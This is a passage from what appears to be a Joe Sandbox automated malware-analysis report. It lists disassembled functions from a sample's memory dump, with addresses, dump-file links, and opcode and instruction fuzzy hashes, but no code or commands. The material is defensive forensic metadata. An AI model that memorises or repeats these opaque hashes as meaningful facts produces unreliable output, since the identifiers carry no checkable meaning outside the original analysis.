                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                        • Instruction ID: 523d9f93e8dd0d142435837c9f92e251e59d0fbc727c9a447fd54ca442006aa8
                                        • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                        • Instruction Fuzzy Hash: 4EC18EB6E29B854BD713873DC802275F395AFE7290F45D72EFDE472942FB20A6818204
                                        Function 001EAD38 Relevance: .3, Instructions: 302COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                        • Instruction ID: 26403a74dea32ab99947f2cdc3ce63fae8a0b2758b1c95b01324d9c06c18aa55
                                        • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                        • Instruction Fuzzy Hash: CCD13570600B80CFD725CF2AC494B6BB7E0BB59300F54892ED89A8BB92D735F845CB91
                                        Function 001DD720 Relevance: .3, Instructions: 295COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                        • Instruction ID: 77c628c091ea7b809c1b73eade8832b32ac7a04ffa7c968f4c427b2207ee991c
                                        • Opcode Fuzzy Hash: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                        • Instruction Fuzzy Hash: ECD13AB010C3808FD7149F15D0A472BBFE0AF95709F19899EE4D90F391C7BA9949DB92
                                        Function 001C45A8 Relevance: .3, Instructions: 291COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                        • Instruction ID: 6f337b6ecd433585ff37679cd861c7331a53ae306d7490c5c05fcfbe74fd3875
                                        • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                        • Instruction Fuzzy Hash: 30B1A072A083515BD308CF25C89176BF7E2EFC8310F1AC93EF89997291D774D9419A82
                                        Function 001B1D78 Relevance: .3, Instructions: 291COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                        • Instruction ID: b7d43f0ae7364d03dcb034da50a6b4ff6eb2d457a5d431769f7dc464e382843f
                                        • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                        • Instruction Fuzzy Hash: 74B17F72A083115BD308CF25C89179BF7E2EFC8310F5AC93EF89997291D774D9459A82
                                        Function 001B2138 Relevance: .3, Instructions: 284COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                        • Instruction ID: 10984764e5c35cc72f7cd2a7d61e79de649165a359370209541b278a335408a5
                                        • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                        • Instruction Fuzzy Hash: 2BB14871E093118FD706EE3DC491265F7E1AFEA280F51C72EE895B7662EB31E8858740
                                        Function 001F1EE8 Relevance: .3, Instructions: 274COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                        • Instruction ID: 14ad3b606a43a96c33bb86396d2c7439c1760e554dc879ba7e8754c40304a36f
                                        • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                        • Instruction Fuzzy Hash: 6991D7B1B042198BEF15CEA8DC80BBAB3A1AF55300F594564EF18AB382D771ED05C7A5
                                        Function 002096FD Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                        • Instruction ID: 90e373f411e1bf9af97d3d77bf71fccddf9ac76e597e339e2b78e126a2955efb
                                        • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                        • Instruction Fuzzy Hash: 6BB14A316206099FD715CF28C48AB657BA1FF45364F29865CE89ACF2E3C335E9A1CB40
                                        Function 001DB198 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                        • Instruction ID: 1ab1b79c48e7c9b5cad366bce4d75e772289bf670dd16081aad269a1e52f886d
                                        • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                        • Instruction Fuzzy Hash: A8C13A75A0471A8FC715DF28C08045AB7F2FF88350F258A6DE8999B721D731E9A6CF81
                                        Function 001ED5A8 Relevance: .3, Instructions: 258COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                        • Instruction ID: bcdc9f711393e8f366f1bf11331990f7c48e92a70114825622f104a39db2d913
                                        • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                        • Instruction Fuzzy Hash: 3F915731928B916AEB168B39DC427BEB7A4FFE6350F14C31AF98872491FB7185818345
                                        Function 001FD39E Relevance: .2, Instructions: 242COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                        • Instruction ID: b70aeee8dd1165f8af0f50a9f4c736a16cb2fb34b669ba58481396072824c3fd
                                        • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                        • Instruction Fuzzy Hash: 2AA13F72A00A19CBEB19CF55DCC1AAEBBB1FB54324F14C22AD51AE77A0D334A944CF50
                                        Function 001C4288 Relevance: .2, Instructions: 240COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                        • Instruction ID: d3f00827e2a6ffecab6d5bc1186f897b18b4fbedba9089d906236ff650fdb2f8
                                        • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                        • Instruction Fuzzy Hash: 7DA16C72A083519BD308CF25C89075BF7E2EFC8710F1ACA3DA8999B254D774E8419A82
                                        Function 0053F835 Relevance: .2, Instructions: 240COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
